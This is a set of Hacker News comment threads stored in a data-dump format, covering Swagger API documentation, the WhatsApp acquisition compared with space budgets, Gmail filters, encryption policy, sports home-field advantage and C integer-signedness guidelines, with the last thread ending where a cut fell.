is agreed, by using a generated mock server instead of waiting for the real
one to be implemented.
------
andreygrehov
In terms of API documentation, the biggest problem is making sure the
documentation is in sync with the actual code. I'm looking into using JSON
Schema [1] along with Swagger and Dredd [2]. Making it all language-agnostic
is a key. If anyone is doing anything similar, please, share your experience.
[1] [http://json-schema.org/](http://json-schema.org/)
[2]
[http://dredd.readthedocs.io/en/latest/](http://dredd.readthedocs.io/en/latest/)
~~~
abraae
We have hundreds of APIs, and we use RAML + json schema.
Since Swagger (OpenAPI) seems to be gaining ascendancy, I recently (some
months ago) looked at migrating off of RAML, but at that time the Swagger guys
had a philosophy that they would only support a subset of json schema.
I get their reasons - they want to be able to generate code. But the things
they didn't support (like oneOf - needed whenever you have a set of resources
of varying types) are a show stopper for many APIs with even moderately
complex payloads.
For us at least, its more important to have a single source of truth for our
APIs than to be able to generate code from the specs. Hence we remain on RAML
(which seems great - just looking like its losing the popularity contest).
~~~
vasusen
We also use RAML + json schema primarily as the single source of truth. We use
[https://jsonschema.net](https://jsonschema.net) to generate json schema by
providing it examples.
------
jerven
This is a bit off topic, but I feel that Swagger etc... and actually most API
docs are to human centric. You can't auto chain APIs together without a lot of
developer intervention. The one thing I saw that allowed that was SADI
services [1]. An awesomely pragmatic use of the semantic web. Pity it did not
get picked up by Google etc...
[1] [http://sadiframework.org/](http://sadiframework.org/)
------
andrewdb
I with there was a way to easily generate a swagger spec from a java project
as a build artifact out of the box, instead of having to serve the spec as a
dedicated API endpoint. There are some plugins, such as swagger-maven-plugin
[0], that do give you this functionality, though.
[0]: [https://github.com/kongchen/swagger-maven-
plugin](https://github.com/kongchen/swagger-maven-plugin)
------
akmanocha
Agreed with some and not all. In essence anythung can be abused. Seagger being
URI is well documented well argued problem. And no support for hypermedia too.
Asciidoc and Spring Rest Docs shine there.
But annotations is not IMHO. Swagger also doesny make thing more complex, they
already are. Swagger also doesnt amke reading docs difficult as such *apart
from URI problem above.
Also Spring Rest learnt from mistakes of Swagger so its a bit unfair on
swagger.
------
ssijak
Checkout Spring REST Docs [http://docs.spring.io/spring-
restdocs/docs/current/reference...](http://docs.spring.io/spring-
restdocs/docs/current/reference/html5/) . Always uptodate docummentation,
which double serves as tests, support HATOAS and more..
------
pushECX
For those that find it tedious to write swagger by hand, I've been using
Stoplight[1] at work and it's been working pretty well. You can create the
spec from scratch, or use their proxy to auto-document your api.
[1]: [https://stoplight.io/](https://stoplight.io/)
------
privacyfornow
I am working on auto generating clients with built in service subscription
based discovery, shock absorbers and circuit breakers based on open api
(swagger). We design our APIs with customer focus and therefore haven't run
into some of these problems so far.
------
a_imho
Problems with Swagger, it is really unfortunately named. I have never used
Swagger, to me it projects an aura that it is a quickly hacked weekend project
its authors did not put any effort to at least name properly. Yes, I know it
is irrational.
------
tschellenbach
Swagger is also a partial solution. I'd rather provide an API client library
and clearly document how to use the client library and not the underlying REST
API.
------
tootie
XSD is bulletproof. Why don't we just keep using XSD?
~~~
abraae
Because people don't want bullet proof. They want quick wins that work
straight away.
~~~
Mikhail_Edoshin
"For every complex problem there is an answer that is clear, simple, and
wrong." :)
------
tomc1985
One problem... it takes Swagger thirty-freakin-seconds to load its auto-
generated whatever for Magento Community, and it has to do this every freakin
time!
~~~
benmarks
That's... odd. Even running M2 off of DevBox on my Mac the swagger endpoint
renders in 5-10s (first visit).
------
kelnos
Oh, man. There is so much wrong with this article. Here we go:
> The documents are written in YAML, which I call XML for lazy people
No. That's ridiculous. XML (and JSON, for that matter) is designed to be read
and written by machines, not humans. (If the design goal was actually
primarily for humans to read and write it, the designers failed. Miserably.)
YAML is a nice middle ground, in that it can be unambiguously parsed by a
machine, but is also fairly pleasant and forgiving for humans to write.
> The enum thing
This is a problem with the code generators, not with Swagger as a spec. Any
API definition format that allows enums (and IMO, all should) will have this
"problem".
Language-native enums are way better to deal with than stringly-typed things.
An alternative might be to generate the enum with an extra "UNKNOWN" value
that can be used in the case that a new value is added on the server but the
client doesn't know about it.
However, I would consider adding a value to an enum to be a breaking API
change, regardless of how you look at it. What is client code expected to do
with an unknown value? In some cases it might be benign, and just ignoring the
unknown value is ok, but I'd think there are quite a few cases where not
handling a case would be bad.
I agree with the author that "adding a new element to the structure of the
payload should NEVER break your code", but that's not what adding an enum
value is. Adding a new element to the structure is like adding a brand-new
property on the response object that gives you more information. The client
should of course ignore properties it doesn't recognize, and a properly-
written codegen for a Swagger definition should do just that.
> Nobody reads the documentation anymore.
The author admits this issue isn't specific to Swagger, and yet harps on it
anyway. What?
> No Hypermedia support ... Which means, you can change that business logic
> whenever you want without having to change the clients... Swagger is URI
> Centric
Oh god. I don't care what Roy Fielding says. No one has embraced hypermedia.
It's irrelevant. Move on.
Being able to change biz logic has nothing to do with hypermedia. That's just
called "good design". That's the entire point of an API: to abstract business
logic and the implementation thereof from the client.
Regardless, the entire idea of being able to change your API without changing
the clients is just silly. If you're changing the API purely for cosmetic
reasons, just stop, and learn how to be a professional. If you're changing the
API's actual functionality or behavior, the code that _calls_ the client needs
to know what the new functionality or behavior is before it can make use of
it, or if it's even safe to make use of it. I imagine there are some small
number of cases where doing this "automatically" is actually safe, but the
incidences of it are so vanishingly small that it's not worth all the extra
complexity and overhead in designing and building a hypermedia API.
APIs are not consumed by "smart" clients that know how to recurse a directory
tree. They are consumed by humans who need to intelligently decide what API
endpoints they need to use to accomplish their goals. Being able to write a
dumb recursing client that is able to spit out a list of API endpoints
(perhaps with documentation) is a cute trick, but... why bother when you can
just post API docs on the web somwehere?
This section is irrelevant given my objections to the last section.
> YAML generation (default Java codegen uses annotations, codegen via this way
> will leak implementation details)
Well, duh, don't do it that way. Do API-first design, or at least write out
your YAML definition by hand after the fact. If nothing else, it's a good
exercise for you to validate that the API you've designed is sane and
consistent.
> Swagger makes a very good first impression
Yes, and for me, that impression has mostly remained intact as I continue to
work with it.
> What are the alternatives?
Having worked with both Spring and JAX-RS, I find it hard to take someone
seriously if they're strongly recommending it as a better alternative to
something as fantastic as Swagger. Also note that the author previously railed
on the reference impl Java tool for its reliance on annotations... which...
same deal with Spring and JAX-RS.
~~~
Mikhail_Edoshin
JSON follows JavaScript syntax, which is specifically meant to be written
manually, i.e. by humans. (This is one of problems of JSON, by the way: look
at commas, for example, especially at the infamous problem of trailing commas
being illegal. This is definitely not meant to be written by machines.)
XML is indeed for machines, that is, the markup part of it. YAML may be more
readable, but note that the specification of YAML is about three times as
large as that of XML (and the XML specification also describes DTDs, a simple
grammar specification language). XML design goals are explicitly stated in its
specification, you're free to take a look.
~~~
gregopet
Any non-trivial format that's meant for humans MUST at the least allow
comments and should not force humans to write needless characters that would
be trivial for a machine to do without (e.g. quotes around key names). Also,
I'm flipping the bird to any format or language that doesn't allow me, a
human, to use multi-line strings. And in JSON I can't even at least
concatenate a few of them into a longer string. JSON is definitely not meant
to be written by humans.
------
mbesto
> The Problems with Swagger
> This is a Swagger misusage problem, not a problem from Swagger per sé.
The TL;DR is a list of gotchas and best practices the author has learned from
using Swagger.
~~~
MyMan1
Almost.
| {
"pile_set_name": "HackerNews"
} |
Things that cost more than Space Exploration: WhatsApp. - DanielleMolloy
http://costsmorethanspace.tumblr.com/post/77364014273/what-costs-more-than-space-exploration-whatsapp
======
ajays
This post is next in the sequence of HN posts after a large exit: comparison
with NASA's budget, cost of trip to Mars, etc.
Typical sequence:
- news of the large exit, submitted repeatedly
- hastily written blogs about why it doesn't make sense
- hastily written blogs about why it makes sense
- cute stories about the company's past: founder(s) living on Ramen, etc.
- comparisons with NASA's budget, Mars exploration budget, Gates Foundation budget, etc.
- and finally, breathless "news" about the slightest change in the acquiree's ToS or some such silly news
~~~
adharmad
Also: What technology stack did the startup use to scale.
~~~
RafiqM
Well, that might be genuinely interesting and useful :)
------
taspeotis
For (what I feel is) a more useful figure, let's look at NASA:
> Annual budget ... when measured in real terms (adjusted for inflation), the
> figure is $790.0 billion, or an average of $15.818 billion per year over its
> fifty-year history. [1]
So WhatsApp is like 1.2 years worth of NASA.
[1]
[http://en.wikipedia.org/wiki/Budget_of_NASA](http://en.wikipedia.org/wiki/Budget_of_NASA)
~~~
agentultra
I thought the article and the whole blog to be a rather fun and cheeky
counter-point to the argument that space exploration is too expensive.
As a total of US budget, NASA's expenses represented less than one half of one
percent in 2012.
We've spent more money on things other than space exploration that, depending
on who you ask, has far less social value.
~~~
maxerickson
It's possible to coherently argue against multiple types of spending.
Given the vagaries of Congress, arguing against any spending you don't like is
probably even a more sensible strategy than arguing first against the ones you
like the least.
------
tokenadult
On the other hand, considering that the surface of the moon has already been
visited by space probes carrying instruments and by manned spacecraft, while
many billions of possible combinations of human beings having conversations
here on earth have never happened, there is probably a lot more undiscovered
return on investment to be had from investing in WhatsApp than from investing
in the Google Lunar XPRIZE. Both are arguably good things to spend money on,
but investment flows sometimes attempt to follow where the big returns are
likely to be.
~~~
kordless
Short term gains for centralized pools of power != long term gains for
humanity. They are going to mine the data in WhatsApp so they can optimize the
way they sell to you.
What we need to be doing is mining the Moon for power. We're going to need it
for all the advertising servers.
~~~
benihana
> _What we need to be doing is mining the Moon for power_
This meme of we should mine Helium-3 from the moon needs to die already. This
kind of thinking is so backwards it's astounding to me that anyone can come up
with it. Why would we mine the moon for power that we can't yet use? No one is
going to go to the moon to energy for a fuel source that _might_ be in use in
the future. It's like spending billions marketing to people in sub-saharan
Africa before you have a product designed, much less built.
~~~
sentenza
We'll need to tap the Moon-He3 when we want to fuel manned interstellar
missions. So probably not this year.
------
blakeeb
Software Engineer at SpaceX here. Exits like WhatsApp not only cost more than
space exploration, but also make recruiting much more difficult for many
companies.
Our best engineers are very entrepreneurial. They don't hesitate to tackle
massive challenges, often without even being asked. When a large exit occurs,
it's an unfortunate siren call: "you could be making billions, writing way
less complicated code."
Why am I taking a salary somewhere when some guy just made billions in four
years? Did he have to worry about loss of human life if his code failed?
I make my own internal siren shut up by being a complete space geek, but
rockets are not always as intriguing to prime candidates in the recruiting
pipeline.
It's time for a reality check.
How many people actually exit with this level of success? Why is enabling our
species to be interplanetary often a harder sell than the prospect of trading
years of your life for a small chance that you might exit with a few billion
dollars?
Greed. It's terrifying how much it prevails in our startup culture.
The size of one's exit is far less important than the impact of one's
technology on the world.
Hack things that make the world better (or other worlds). If riches come as a
result, great, but our startup culture's emphasis on valuation over innovation
is, in my opinion, our achilles' heel.
(My views are completely personal opinions and do not reflect the views of the
company. I love our startup culture and am proud to be a part of it, but I'm
convinced that when I look back I will clearly view the code I've written here
to be way more important for humanity's progress than the code I've written
for entrepreneurs' selfish attempts at billion dollar exits)
------
loneranger_11x
I am not sure why people are so dissed at the cost of WhatsApp acquisition.
There is a significant value to whatsapps huge network. You know what else
cost almost as much as NASA's entire budget last year - Bonus paid to
GoldmanSachs' employees
[http://www.ibtimes.co.uk/goldman-sachs-pay-bonuses-
hit-12-61...](http://www.ibtimes.co.uk/goldman-sachs-pay-bonuses-
hit-12-61bn-2013-1432575)
~~~
hnnewguy
> _Bonus paid to GoldmanSachs ' employees_
Goldman Sachs has over 30,000 employees and earns over $8BB in _profit_ a
year. That's _real_ money in the pockets of stakeholders.
But, as seems to be common on HN, I'll bet you think bankers are scum and the
people at WhatsApp are doing yeoman's work, selling ads and handing data over
to spying agencies.
~~~
vikp
The interesting part (for me at least), and the real reason that you guys are
having a debate at all, is because our notion of value is so far abstracted
from human necessities these days that its hard to put a finger on what value
is.
There are a few things that we inarguably need -- food, shelter, water, and so
on. See the bottom two tiers of Maslow's pyramid:
[http://en.wikipedia.org/wiki/Maslow's_hierarchy_of_needs](http://en.wikipedia.org/wiki/Maslow's_hierarchy_of_needs)
.
It's the middle tier and above when things start to get fuzzy and hard to
define. When most people globally were engaged in work towards the bottom, it
was easy to understand the value that was being added (I grow food! I help
myself and others survive!).
Now, when most people (at least in developed countries) are doing things
towards the top of the pyramid or off of the pyramid entirely, its harder to
define value. Money is one proxy (which you are using), but its probably a
poor one. I would love to see better ones.
------
ig1
Flagged because the comparison of asset cost to operational cost is
nonsensical.
It's like telling someone buying a million dollar apartment "but you could
rent a mansion for a million dollars/year instead".
~~~
stackcollision
The OP is not necessarily talking about operation cost here. For the cost of
what Facebook paid for WhatsApp I could launch 4.6 million kilograms into
orbit on a Falcon 9, which is essentially the cost of lifting the ISS. When
you're talking about space, the cost of launching should be included in your
asset cost, because otherwise you're million dollar satellite is worthless.
~~~
rwmj
Facebook didn't pay it all in cash. They paid much of it in (soon to be)
worthless Facebook stock.
And this is the problem with the comparison. To fund a space mission, Facebook
would have had to either try to realize the value through another huge stock
sale, or it would have to use up its cash reserves. The first option is
essentially impossible. The second would lead to massive lawsuits as well as
having a very uncertain outcome (you think a bunch of web designers could
really build a rocket?)
~~~
Tloewald
Thanks for making this point. Buying a company with stock doesn't actually
result in someone spending something to get something, it merely merges two
companies and assigns ownership of the combined entity.
------
goatforce5
The value to Facebook of WhatsApp is greater than them funding NASA for a year
and a bit.
Similarly, I could probably feed a starving kid in a third world country for a
day or two for $4, but instead i'm going to go buy a latte, because apparently
that has a greater reward for me personally...
Now I feel like a jerk. Thanks Zuckerberg!
------
SapphireSun
For what it's worth, the fact that WhatsApp is enabling advanced
communications in poor countries for free probably liberates a vast untapped
quantity of human capital. That's a much clearer value proposition than a lot
of other startups (e.g. Twitter, which merely eases connection rather than
making it possible for cash strapped people).
That said, I'd be a fan if Silicon Valley's venture capital got really into
making escape velocity affordable for the average Joe....
~~~
rwmj
WhatsApp is basically email, and we've had email for a while.
~~~
shawabawa3
And mars is basically the earth, and we already know almost everything about
the earth
~~~
Fomite
> we already know almost everything about the earth
Not even close.
------
melling
Well, this article is a complete waste of time, and it's #1 on HN, of course.
What the hell, geeks can't help themselves. Seriously, people need to quit
whining about stuff like this, accept it, and figure out how to solve whatever
problem they'd like to see solved. The US economy is almost $17 trillion.
Together, we're freak'in rich.
[http://en.wikipedia.org/wiki/Economy_of_the_United_States](http://en.wikipedia.org/wiki/Economy_of_the_United_States)
People will fund comic books, video games, etc on KickStarter. I think that
market is approaching $1 billion. Perhaps, there's another multi-billion
market for a private "space program", medical research, or whatever. Create
more X-Prizes ([http://www.xprize.org](http://www.xprize.org)). They create a
lot of value for the investment. You only pay the winner but you get effort
all the participants.
~~~
coldtea
> _The US economy is almost $17 trillion. Together, we 're freak'in rich._
Well, if you ignore that fact that the vast majority of those $17 belong to
astoninglishly few people.
In that sense, then yes, Warren Buffet and some family living in a shack in
Mississippi are rich together.
~~~
melling
Yes, we can ignore that fact. That was a given, right? There's plenty of money
in the US economy that can be funneled into other projects. If there wasn't,
KickStarter wouldn't exist, correct?
~~~
coldtea
Kickstarter's existance just means that there is a number of people that can
give $10 or $100 for a project they like.
I don't see how to go from there to the assumption that's plenty of money for
all kinds of projects.
Most Kickstarter campaigns are quite small in requested budget for example.
Space exploration, not so much.
~~~
melling
Nowhere did I say that the solution was to exactly imitate KickStarter, or
even imitate KickStarter to any degree. The solution is left for someone to do
some creative thinking, and a lot of work.
I'm sure someone like you can give a million reasons why an electric car
company won't work. It's up to that one in a billion person to solve the
problem. In the meantime, I get tired of people complaining about why we
should solve that problem. Oh... wait...
------
welshrats
Everyone is talking about the value of WhatsApp's social network to
advertisers, but I thought one of the key points of WhatsApp was that it was a
paid service and they collect no data on you specifically because they aren't
interested in selling ads. [[http://blog.whatsapp.com/index.php/2012/06/why-
we-dont-sell-...](http://blog.whatsapp.com/index.php/2012/06/why-we-dont-sell-
ads/)] Should people who bought into the idea that they were not the product
be looking for a new paid WhatsApp like product?
~~~
TeMPOraL
But don't they _have to_ collect the data about you because law? (to use the
newly allowed English construct ;)).
Also, in the blog post they didn't explicitly stated that they don't collect
data; they wrote that they just don't care about it much when thinking about
product development.
------
mallamanis
Comparing WhatsApp to space exploration is unfair. Arguably both of them are
equally useful/useless (depends on who you ask). But what about if all (or
even half) that money had been spent to (i.e.) cancer research or something
that would radically improve people's lives? I think that's the "utility
trade-off" question one should ask...
------
t1m
The population of Kenya is almost 50 million people.
It's GNP is $19.9B.
The population of WhatsApp is 50 employees!
~~~
shmed
To be fair, GNP is an annual value, while Whatsapp's valuation include it's
whole value, including potential future annual revenues.
------
jneal
I can't help but think we're stuck in the middle of another .com bubble
~~~
antocv
If its stuck its not a bubble, its supposed to inflate
~~~
shmed
He said "we" are stuck, not the bubble is stuck.
------
hartator
I guess when people are saying that space operation costs a lot of money, they
are referring to state program like NASA not google lunar...
------
stefantalpalaru
You can't pay for space exploration with dotcom bubble stock.
------
mw67
Whatsapp is certainly more useful to humanity than space exploration.
~~~
S4M
Are you being sarcastic?
~~~
mw67
No, I truly believe that having a way for everyone to communicate for free,
privately, and anywhere is just so great. This level of communication enables
so many possibilities for people that couldn't been done so simply oterhwise.
I live in Hong Kong and do not know a single person not using whatsapp. It
helps everyone. Although I'm a huge fan of space exploration as well, I still
think letting people to communicate easily is more valuable for our day to day
lives.
~~~
S4M
Oh OK, I see what you mean now. > No, I truly believe that having a way for
everyone to communicate for free, privately, and anywhere is just so great.
I agree with that, but whatsapp isn't a new way of communicating - in the
sense that it's not a new protocol like the phone or internet. While it's
convenient it's not revolutionary and I am sure that Hong Kongers would be
using something else.
Also you don't know what space exploration could bring yo your everyday life
(probably we could build new stuff from materials not available on Earth or
that are very rare...).
~~~
mw67
You're absolutely right on both points :)
| {
"pile_set_name": "HackerNews"
} |
Ask HN: Anyone else have long-standing GMail filters that have stopped working? - JabavuAdams
Some filters I've had working in Gmail for years seem to have intermittently stopped working over the last year or so. I'll have a filter with a simple subject line match, and now I'm getting these messages in my Inbox, when they should be bypassing it.<p>Haven't been able to discern any pattern to this yet, but I haven't really dug into it. I wonder why the regression? Is this some kind of throttling? Like approximate matching?
======
byoung2
I have noticed that occassionally the filters seem to run on a delay...I have
filters to bypass the inbox and apply a label. I will see the email in the
inbox for up to an hour before the filter runs and then later I see the label
applied and the email is no longer in the inbox.
~~~
moonka
I've noticed the same on Spam filtering as well. It used to be instant but now
more and more I see things show up for a few minutes before disappearing. I
also just recently set up a new gmail account that required some filtering to
a sizeable inbox and it was very painful because of the delays.
~~~
codenut
This is what you call eventual consistency.
------
mikekchar
I had all my filters stop working about 5 or 6 months ago. I had to remove
them all. New ones made exactly the same worked fine, but since I don't trust
them now, I don't have any filters any more.
No idea how it broke, but I guess it's a matter of software upgrades without
the requisite data migration. Google's data composition is _very_ complex so I
can see this happening from time to time.
| {
"pile_set_name": "HackerNews"
} |
The class divide in Silicon Valley - ahsanhilal
http://www.weeklystandard.com/articles/silicon-chasm_768037.html?page=2
======
ahsanhilal
A bit reductionist in its claims I would say
| {
"pile_set_name": "HackerNews"
} |
Show HN: My first startup - So Yummy - overworkedasian
http://soyum.my/
after months of baking with my girlfriend, we decided to launch our first startup together: SoYummy.<p>I got the inspiration when she first got a subscription to Birchbox and i thought, there must be 'bakery/sweets' version of Birchbox. After some research, i discovered that there really isn't anything like this. This wont make me a million dollars overnight, but we wanted to give this a shot and really try to make it work. Let me know if you got any questions!
======
overworkedasian
after months of baking with my girlfriend, we decided to launch our first
startup together: SoYummy. I got the inspiration when she first got a
subscription to Birchbox and i thought, there must be 'bakery/sweets' version
of Birchbox. After some research, i discovered that there really isn't
anything like this. This wont make me a million dollars overnight, but we
wanted to give this a shot and really try to make it work. Let me know if you
got any questions! would love some feedback!
------
botolo
Nice idea. I look forward to seeing the kind of cookies you will provide and
the price of the subscription.
------
cdvonstinkpot
Clickable:
<http://soyum.my/>
| {
"pile_set_name": "HackerNews"
} |
Nvidia announces support for SLI on AMD chipsets - primesuspect
http://tech.icrontic.com/news/nvidia-announces-support-for-sli-on-amd-chipsets/
======
daeken
Why not link the original source, without the ridiculous commentary?
[http://blogs.nvidia.com/2011/04/you-asked-for-it-you-got-
it-...](http://blogs.nvidia.com/2011/04/you-asked-for-it-you-got-it-sli-for-
amd/?sf1380441=1)
~~~
primesuspect
Because the ridiculous commentary makes me laugh, and I am a human being who
enjoys that sort of thing.
------
kitanata
This is too funny. Just yesterday I returned by Nvidia GFX 640 SE because
Fermi was not compatible with many AMD Chipset motherboards, including mine. I
pikced up the AMD Radeon HD 6850 instead. It runs like a charm.
------
Bandrik
(insert generic trolling statements that slam NVIDIA here)
| {
"pile_set_name": "HackerNews"
} |
Empty stadiums have shrunk football teams’ home advantage - prostoalex
https://www.economist.com/graphic-detail/2020/07/25/empty-stadiums-have-shrunk-football-teams-home-advantage
======
elgenie
Home field advantage lessening but not disappearing is as expected. There are
two major sources of home field advantage (basing on US sports):
* What fans influence: subconscious referee biases (not wanting to be booed for a close call), heckling that slightly impacts players’ focus, objects being waved in their line of sight, noise levels rising at inopportune times, etc.
* Travel/comfort: the home team players sleep in their own custom-tailored sleeping environments (these can include stuff like oxygen tents, not just nice mattresses), don’t spend time encased in a plane / train / bus environment not designed for optimizing future athletic performance, and don’t have travel stresses and logistical headaches. Also for those inclined, the local club / strip club / groupie scene doesn’t hold the same mysterious allure on a random Tuesday night as it might for the lad from out of town.
The second set of factors remains even when fans aren’t allowed inside the
arena.
~~~
mrisoli
And maybe not so relevant these days because most pitches are standard size,
but years ago football pitches could vary in size, 90-120m in length, and
45-90m in width, maybe in the past even more, I remember some quoting some
pitches as long as 130m+
Teams who were on the boundaries of these often took advantage of it, my home
team played in a larger than average pitch and you would clearly see teams
that went in full pressure to lose a lot of gas by the second half, the best
coaches knew how to make this count. On the other side of the spectrum, teams
with shorter fields favoured playing long balls straight from goal kicks to
the strikers.
Tbf I miss a little bit the days where these small inconsistencies would
affect the game and require a little bit more studying on the coaches part.
~~~
zimpenfish
The numbers you quoted are still the standard although international pitches
are constrained to 64-75m wide, 100-110m long. That probably means top teams
are likely to use the international standard or at least have the option to
mark the pitch thusly when things like the World Cup or Euros need stadiums.
~~~
mrisoli
In Brazil they would vary wildly so that's where my nostalgia comes from,
after the WC in 2014 pretty much all of them were standardised to 105x68
------
ComputerGuru
A bit of a shameless plug, but a few years ago I Googled for scientific and
statistical analyses of home field advantage and didn't find anything, so I
ended up crunching the numbers for myself.
With the caveat that this is for baseball and not football, home field
advantage has shrunk tremendously over the years. Just look at the curve of
"field kindness" over the history of the MLB, it is insane how much of a
difference the field you were visiting used to make!
[https://neosmart.net/blog/2016/homefield-
advantage/](https://neosmart.net/blog/2016/homefield-advantage/)
(my favorite bit is the curve ball when it comes to fields that confer a
statistical _advantage_ to the visiting team!)
~~~
regulation_d
tbh, I don't really understand why Coors would be such an advantage. It's not
like the visiting team doesn't also benefit from the additional ball flight.
Do you think it has to do with roster building? Like the Rockies don't spend
money on pitching because pitching has less value at Coors, so they load up on
offensive talent instead?
~~~
willturman
In addition to farther fly ball flight, the thinner air in Coors Field lessens
the amount of distance a breaking ball moves when pitched. You'd think they
would spend top dollar for every pitcher with a heavy 94+ mph sinker.
While other teams play a single (or handful of) series a year at Coors Field,
the Rockies have to adjust to breaking pitches being more effective while
playing away half the time which would be a bigger disadvantage than the ball
not flying as far at away ballparks.
------
tomasz207
Freakonomics covered this in one of their podcasts. Their finding was that
home-field advantage had more to do with the crowd influencing the calls of
the officials. They would typically favor the home team. I wonder if this will
change further with the use of VAR.
[https://freakonomics.com/2011/12/18/football-freakonomics-
ho...](https://freakonomics.com/2011/12/18/football-freakonomics-how-
advantageous-is-home-field-advantage-and-why/)
~~~
dfxm12
It's amazing that the MLB has the smallest home field advantage, despite the
fact that baseball fields are actually pretty different from each other.
I would've thought stuff like being used to the visual backdrop behind a
pitcher's arm would let you see a pitch better or knowing where to stand to
best play a ball caroming off the outfield wall would give more of an
advantage.
~~~
InitialLastName
> It's amazing that the MLB has the smallest home field advantage
And given that, relative to the other sports, there's an actual difference in
the rules and play of the game based on which team is at home (less so now hat
the DH is in both leagues).
------
bluejellybean
I'm really surprised we don't hear more about teams using tools like VR to
play in the 'opponents turf'. One thing I noticed playing sports was how
terrible we could feel just from not knowing where locker rooms are when one
gets off a bus. I would love to see a study do something along the lines of,
make players travel to opponents facilities a few times and check results.
This above result could easily take place in VR for the opponents facilities
and arena. Model their locker rooms, field/court/etc, model screaming fans of
the wrong color, model boos, etc etc. Essentially try and eliminate some home
field advantage by making it feel more like home.
~~~
dmurray
Not VR but it was reported the English rugby team were training in front of
giant speakers to prepare for matches against Wales [0], who have a famously
loud crowd and a stadium that amplifies it, especially if the roof is closed.
I'd be surprised if gridiron teams don't do something similar since crowd
noise is genuinely a tactical issue there (it's more disruptive to the
offense) in addition to a psychological one.
[0] [https://www.skysports.com/rugby-
union/news/12333/9699222/six...](https://www.skysports.com/rugby-
union/news/12333/9699222/six-nations-england-using-speakers-to-replicate-
noise-ahead-of-wales-game)
------
russellbeattie
The Italian league games I've seen played in empty stadiums have been great. I
think adding the sense of hearing back into the game due to lack of crowd
noise does a lot for a team's coordination and thus quality of play. Maybe
this is just my opinion based on a few matches, but there is a palpable
difference in play.
Also a lot less flopping on the ground in fake agony. With no crowd to play
to, players fall over and then get back up again. It's very refreshing to
watch.
~~~
smabie
I was under the impression that they fell over in agony for the refs, not the
crowd? But then I don't know much about soccer.
~~~
ehnto
Perhaps it's harder to justify internally if the only people watching know
exactly what you just did? I've always been surprised by the shamelessness of
soccer dives, I definitely don't understand it.
~~~
dynamite-ready
A totally subjective answer here, but I think it's because of the speed the
game is played at.
It's very easy to trip when sprinting at full speed while concentrating on a
single object. The slightest external force will put you on the ground very
quickly.
Rugby, Gridiron and Ice Hockey players will also know that, but frequent falls
under pressure are expected by the rules. In soccer, it's a lot more subtle
(shirt pulling, various rules around obstruction, the height at which you keep
your hands... all sorts). There's plenty of opportunity fool a referee, so you
will instinctively try to do so. Especially if your style of play generally
draws opposing players into fouling you regularly already.
I'd say that the introduction of video referees (VAR) are probably more
effective in stopping that kind of behaviour, than empty stadiums. But you'd
never know.
------
dynamite-ready
I also wonder if player performance has measurably improved (or degraded),
when playing regularly without an audience.
~~~
dairylee
I think this is interesting and something I've thought about since the return
of football.
Jurgen Klopp was always trying to get the crowd engaged and pumped up because
he believes it has a huge effect on how his Liverpool team play. Without the
crowd they seem to be missing that extra 1% of intensity that made them
incredible pre-lockdown.
Whereas Manchester City probably don't feed off the crowd as much as Liverpool
do. Manchester City are all about rehearsed routines so they may even find it
easier without a crowd as they'll be able to communicate much easier.
~~~
sleavey
Hard to say because by the start of lockdown Liverpool had basically wrapped
up the title. Their performance dropped after they were mathematically
champions.
~~~
amateurdev
Yeah I agree with this. They were in top form and the crowd obviously helped.
Anfield is massive for the team with supporters around. But after having such
a long break due to the lockdown can change the dynamics. Its hard to produce
that kind of form after a hiatus. And yes, maybe there even was something
about already having won the league mathematically. It can calm the players
and lower the intensity slightly.
------
niffydroid
I can understand this. Portsmouth at home is pretty loud and vocal. After
watching Pompey fail in the play offs, it might have helped, but then again
that's probably because Kenny Jacket football style is horrible. #JacketOut
------
_the_inflator
Very interesting.
I don't know whether this study measures only the outcome or contributing
factors. For example, in Germany, anti-COVID measurements lead to the
following result: way fewer to now discussions with the umpire. Pack forming
has been forbidden. Empty stadiums are only part of the measures but, in my
opinion, not the contributing factors. These factors contributed massively to
the pace of the game. And if no players are trying to influence the umpire -
well, you get different results.
------
amachefe
Familiarity of the stadium also count, I mean you are going to play in an
arena 19 times vs once, there will be differences.
------
known
disadvantage for extrinsic motivators relative to internal is that work does
not persist long once external rewards are removed
[https://en.wikipedia.org/wiki/Motivation#Extrinsic_motivatio...](https://en.wikipedia.org/wiki/Motivation#Extrinsic_motivation)
| {
"pile_set_name": "HackerNews"
} |
Raspberry Pi : Cheat Sheet ($25 ARM computer) - codedivine
http://www.silicon.com/technology/hardware/2011/10/03/raspberry-pi-cheat-sheet-39748024/?s_cid=991
======
codedivine
I am aware that HN discourages editing of page title. In this case, I added
($25 ARM computer) to title as otherwise the title would have made no sense to
those not familiar with the Rasperry Pi.
That said, it is a tiny board (about the size of a USB stick) with 700MHz
ARM11 and a Broadcom GPU with OpenGL ES 2.0 support and 1080p video decode. It
will have an HDMI port and can connect to keyboards and mice and will run
Linux. Should be available in November. More details here:
<http://www.raspberrypi.org/>
| {
"pile_set_name": "HackerNews"
} |
Obama calls for public debate over encryption - declan
http://wtop.com/tech/2015/02/obama-calls-for-public-debate-over-encryption/
======
dalke
We've had, what, 20+ years of public debate, if I start dating with the
Clipper chip.
I find it hard to believe there's more to say on the topic. Well, not unless
law enforcement and his administration reverse course and start releasing more
information on the topic. Otherwise we're left with the handful of
investigative reporters and whistleblowers who reveal how internal US policies
actually work.
No, I can only believe this is a wishy-washy non-committal message, using a
lot of words to avoid the topic.
------
angersock
_He said people who favor airtight encryption also want to be protected from
terrorists._
They also favor not being no-knocked and shot in the middle of the night, or
having their dogs shot, or getting stuck in a holding cell until the police
are bored with them, or being shot by drones overseas, or just plain
disappeared.
EDIT:
See also
[https://news.ycombinator.com/item?id=9048629](https://news.ycombinator.com/item?id=9048629)
.
They've basically rooted all avenues of communcation...I fail to feel sorry
for them.
| {
"pile_set_name": "HackerNews"
} |
OMG: Our Machinery Guidebook - onekorg
https://ourmachinery.com/files/guidebook.md.html
======
Aardappel
Generally a wonderful set of minimalistic rules, much could carry over beyond
C.
Except for: "OMG-API-3: Unsigned integers are preferred over signed".. I feel
they're on the wrong side of history with this one.
"Prefer unsigned" only works if you can do 99% of your codebase this way,
which, besides LLVM, probably doesn't work for anyone. Having a codebase that
is 99% signed is much more feasible. The worst is a codebase with plenty of
both, which will be guaranteed endless subtle bugs and/or a ton of casts.
That's what they'll end up with.
Apparently the C++ committee agrees that size_t being unsigned was a huge
mistake (reference needed), and I would agree. Related discussion:
[https://github.com/ericniebler/stl2/issues/182](https://github.com/ericniebler/stl2/issues/182)
[https://github.com/fish-shell/fish-
shell/issues/3493](https://github.com/fish-shell/fish-shell/issues/3493)
[https://wesmckinney.com/blog/avoid-unsigned-
